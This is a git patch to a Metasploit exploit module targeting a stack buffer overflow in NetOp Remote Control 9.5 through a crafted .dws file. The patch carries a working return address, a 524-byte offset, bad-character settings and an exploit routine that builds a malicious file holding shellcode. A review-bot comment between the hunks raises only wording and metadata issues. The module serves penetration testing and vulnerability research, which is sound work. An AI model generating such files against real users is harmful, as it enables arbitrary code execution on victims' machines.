From c79060915aa6dfb6b3f866226176a85e44f723fe Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 3 Apr 2012 11:51:58 -0500 Subject: [PATCH] Add Chap0's netop exploit --- modules/exploits/windows/fileformat/netop.rb | 56 ++++++++------------ 1 file changed, 23 insertions(+), 33 deletions(-) diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb index 62465e3db1..e6097a55f2 100644 --- a/modules/exploits/windows/fileformat/netop.rb +++ b/modules/exploits/windows/fileformat/netop.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -14,19 +14,18 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'NetOp Remote Control 9.5 Buffer Overflow', - 'Description' => %q{ + 'Name' => 'NetOp Remote Control Client 9.5 Buffer Overflow', + 'Description' => %q{ This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5. - When opeining a .dws file containing a specially crafted string longer then 520 - characters will allow an attacker to execute arbitraty code. + When opening a .dws file containing a specially crafted string longer then 520 + characters will allow an attacker to execute arbitrary code. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ - 'Ruben Alejandro "chap0"', - + 'Ruben Alejandro "chap0"', ], - 'References' => + 'References' => [ [ 'OSVDB', '72291' ], [ 'URL', 'http://www.exploit-db.com/exploits/17223/' ] 
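Review bot: The rewritten 'Description' still reads "longer then 520" and its second sentence has no subject ("When opening a .dws file ... will allow an attacker"), so the typo pass in this hunk is incomplete; I would change the two lines to `Opening a .dws file containing a specially crafted string longer than 520` and `characters allows an attacker to execute arbitrary code.`. The 'Name' now says "NetOp Remote Control Client 9.5" while the first line of the description still says "NetOp Remote Control 9.5", which leaves the affected component ambiguous for anyone scoping exposure from the module metadata; both should use the same product name. 'References' lists only an OSVDB id and an exploit-db URL, so if a vendor advisory or fixed version exists it would be worth adding there. The `update_info` call in `initialize` continues past the end of this hunk.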
@@ -34,52 +33,43 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'ExitFunction' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => 'true' }, - 'Platform' => 'win', - 'Payload' => + 'Platform' => 'win', + 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, - - 'Targets' => + 'Targets' => [ [ 'Windows XP SP3', { - 'Ret' => 0x223159fc, # push esp # ret - NFMNT.dll + 'Ret' => 0x20d6c32c, # push esp # ret - nrp.DLL 'Offset' => 524 } - ], - - [ 'Windows 7', - { - 'Ret' => 0x20d6c32c, # push esp # ret - nrp.DLL - 'Offset' => 524 - } - ], + ] ], - 'Privileged' => false, - 'DisclosureDate'=> 'Apr 28 2011', - 'DefaultTarget' => 0)) + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2011', + 'DefaultTarget' => 0)) register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.dws']), + OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']), ], self.class) end def exploit - - buffer = rand_text(target['Offset']) - buffer << [target.ret].pack('V') + buffer = rand_text(target['Offset']) + buffer << [target.ret].pack('V') buffer << make_nops(30) buffer << payload.encoded file_create(buffer) - end + end